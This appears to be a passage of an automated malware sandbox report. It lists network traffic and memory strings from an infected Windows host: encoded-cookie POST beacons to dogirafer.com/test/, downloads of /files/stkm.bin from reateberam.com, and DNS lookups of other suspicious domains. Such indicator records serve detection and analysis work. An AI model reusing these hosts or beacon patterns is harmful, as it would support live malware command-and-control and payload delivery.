            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hlagqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TudUNGNfWRLCRv+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hiYwqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TudUNGNfWRLCRv+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hiYgqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TudUNGNfWRLCRv+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hiYQqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TudUNGNfWRLCRv+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hiYAqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TudUNGNfWRLCRv+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hiZwqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TudUNGNfWRLCRv+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hiZgqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TudUNGNfWRLCRv+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hiZQqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TudUNGNfWRLCRv+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Windows\explorer.exeCode function: 8_2_0303900C InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,8_2_0303900C
            Source: global trafficHTTP traffic detected: GET /files/stkm.bin HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.com
            Source: global trafficHTTP traffic detected: GET /files/stkm.bin HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /files/stkm.bin HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.com
            Source: global trafficDNS traffic detected: DNS query: huanvn.com
            Source: global trafficDNS traffic detected: DNS query: vutarf.com
            Source: global trafficDNS traffic detected: DNS query: reateberam.com
            Source: global trafficDNS traffic detected: DNS query: dogirafer.com
            Source: unknownHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hmdViRxTPtzmAYfxODCVLcbPy2vCfMYFSg6m741x7W74yYwzVuV08oc+L33B0vDqTu8/JSvpK54Ytrr38FQTZAvp/2bg1TAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWuehdE1VOeWVOCBw+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 92Cache-Control: no-cache
            Source: explorer.exe, 00000008.00000003.3856101577.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3094423766.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4549635767.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2323476795.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2323476795.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3094423766.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4549635767.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3856101577.0000000009AF9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
            Source: explorer.exe, 00000008.00000002.4535485561.0000000000F13000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2320112731.0000000000F13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.v
            Source: explorer.exe, 00000008.00000003.3856101577.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3094423766.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4549635767.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2323476795.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2323476795.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3094423766.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4549635767.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3856101577.0000000009AF9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
            Source: explorer.exe, 00000008.00000003.3856101577.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3094423766.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4549635767.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2323476795.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2323476795.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3094423766.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4549635767.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3856101577.0000000009AF9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
            Source: explorer.exe, 00000008.00000003.3856101577.0000000009B41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?3880ff7
            Source: explorer.exe, 00000008.00000003.3856101577.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3094423766.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4549635767.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2323476795.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2323476795.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3094423766.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4549635767.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3856101577.0000000009AF9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
            Source: explorer.exe, 00000008.00000002.4549635767.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3094423766.00000000099B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2323476795.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3856101577.00000000099C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
            Source: rundll32.exe, 00000003.00000002.4535814161.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2318890532.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.3190095879.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536842943.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3190119329.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421653008.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3219518856.000002339E1CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4536479202.000002339E1CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2511990228.000002339E1CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r10.i.lencr.org/0
            Source: rundll32.exe, 00000004.00000002.4536842943.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3190119329.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421653008.0000027617D1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r10.o.lencr.o
            Source: rundll32.exe, 00000003.00000002.4535814161.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2318890532.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.3190095879.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536842943.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3190119329.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421653008.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3219518856.000002339E1CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4536479202.000002339E1CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2511990228.000002339E1CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r10.o.lencr.org0#
            Source: rundll32.exe, 00000003.00000002.4535814161.000001CEAE3A8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.3190095879.000001CEAE422000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4537635408.000001CEB01E0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2318826583.000001CEAE494000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4535814161.000001CEAE422000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2318890532.000001CEAE421000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421653008.0000027617CE6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3189915163.0000027617D52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536296761.0000027617CE8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536958246.0000027617D52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421623053.0000027617D52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3190080056.0000027617D55000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3219328549.000002339E1F5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3219239496.000002339E1FA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2513069428.000002339E1F5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4535937784.000002339E11E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4536552097.000002339E1F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r11.i.lencr.org/0
            Source: rundll32.exe, 00000004.00000003.3189915163.0000027617D52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536958246.0000027617D52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421623053.0000027617D52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r11.o.lencr.org0
            Source: rundll32.exe, 00000003.00000002.4535814161.000001CEAE3A8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.3190095879.000001CEAE422000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4537635408.000001CEB01E0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2318826583.000001CEAE494000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4535814161.000001CEAE422000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2318890532.000001CEAE421000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421653008.0000027617CE6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3189915163.0000027617D52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536296761.0000027617CE8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536958246.0000027617D52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421623053.0000027617D52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3190080056.0000027617D55000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3219328549.000002339E1F5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3219239496.000002339E1FA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2513069428.000002339E1F5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4535937784.000002339E11E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4536552097.000002339E1F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r11.o.lencr.org0#
            Source: explorer.exe, 00000008.00000000.2322979543.0000000008890000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.2322953274.0000000008870000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000002.4547057338.0000000007DC0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
            Source: rundll32.exe, 00000003.00000002.4535814161.000001CEAE3A8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.3190095879.000001CEAE422000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4537635408.000001CEB01E0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4535814161.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2318890532.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.3190095879.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2318826583.000001CEAE494000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4535814161.000001CEAE422000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2318890532.000001CEAE421000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536842943.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421653008.0000027617CE6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3189915163.0000027617D52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3190119329.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536296761.0000027617CE8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536958246.0000027617D52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421623053.0000027617D52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421653008.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3190080056.0000027617D55000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4535937784.000002339E193000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3219328549.000002339E1F5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3219239496.000002339E1FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
            Source: rundll32.exe, 00000003.00000002.4535814161.000001CEAE3A8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.3190095879.000001CEAE422000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4537635408.000001CEB01E0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4535814161.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2318890532.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.3190095879.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2318826583.000001CEAE494000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4535814161.000001CEAE422000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2318890532.000001CEAE421000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536842943.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421653008.0000027617CE6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3189915163.0000027617D52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3190119329.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536296761.0000027617CE8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536958246.0000027617D52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421623053.0000027617D52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421653008.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3190080056.0000027617D55000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4535937784.000002339E193000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3219328549.000002339E1F5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3219239496.000002339E1FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
            Source: rundll32.exe, 00000004.00000003.3189915163.0000027617D52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536958246.0000027617D52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421623053.0000027617D52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lew
            Source: explorer.exe, 00000008.00000002.4553248554.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2325776934.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
            Source: explorer.exe, 00000008.00000000.2321862445.00000000076F8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
            Source: explorer.exe, 00000008.00000002.4549635767.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3094423766.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3856101577.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2323476795.0000000009ADB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
            Source: explorer.exe, 00000008.00000000.2321862445.0000000007637000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4544441283.0000000007637000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
            Source: explorer.exe, 00000008.00000000.2321008105.00000000035FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4540619614.00000000035FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3095470555.00000000035FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3857371736.00000000035FA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.coml
            Source: explorer.exe, 00000008.00000003.3861913197.0000000009C93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4554444765.000000000C8DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4554853307.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4554024065.000000000C81C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4555029441.000000000CA51000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3856101577.0000000009C93000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dogirafer.com/
            Source: explorer.exe, 00000008.00000002.4555029441.000000000CA51000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dogirafer.com/.5
            Source: explorer.exe, 00000008.00000002.4553248554.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dogirafer.com/3405117-2476756634-1003
            Source: explorer.exe, 00000008.00000003.3861913197.0000000009C93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3856101577.0000000009C93000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dogirafer.com/Z#q
            Source: explorer.exe, 00000008.00000002.4554444765.000000000C8DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dogirafer.com/eo
            Source: explorer.exe, 00000008.00000002.4554024065.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dogirafer.com/m
            Source: explorer.exe, 00000008.00000002.4554444765.000000000C930000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4554024065.000000000C81C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3201304277.00000000030C0000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4549635767.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3362838683.00000000089B0000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3414819462.00000000088C0000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4538744172.00000000031FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3445364549.0000000008980000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4555029441.000000000C9F9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dogirafer.com/test/
            Source: explorer.exe, 00000008.00000002.4554024065.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dogirafer.com/test/E
            Source: explorer.exe, 00000008.00000003.3861913197.0000000009C93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3856101577.0000000009C93000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dogirafer.com/test/N#e
            Source: explorer.exe, 00000008.00000002.4554024065.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dogirafer.com/test/a
            Source: explorer.exe, 00000008.00000002.4555029441.000000000C9F9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dogirafer.com/test/ys
            Source: explorer.exe, 00000008.00000002.4554444765.000000000C8DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dogirafer.com/uo
            Source: explorer.exe, 00000008.00000000.2323476795.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3103191493.0000000009BB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4549635767.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3103624134.0000000009C21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3856101577.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3100576777.0000000009B8F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3094423766.0000000009B41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
            Source: rundll32.exe, 00000003.00000002.4535814161.000001CEAE41C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421807994.0000027617CDD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536296761.0000027617CDD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4535937784.000002339E18D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://huanvn.com/
            Source: rundll32.exe, 00000003.00000002.4535814161.000001CEAE41C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://huanvn.com/P
            Source: rundll32.exe, 00000006.00000002.4535937784.000002339E18D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://huanvn.com/Q
            Source: rundll32.exe, 00000004.00000003.2421807994.0000027617CDD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536296761.0000027617CDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://huanvn.com/~C
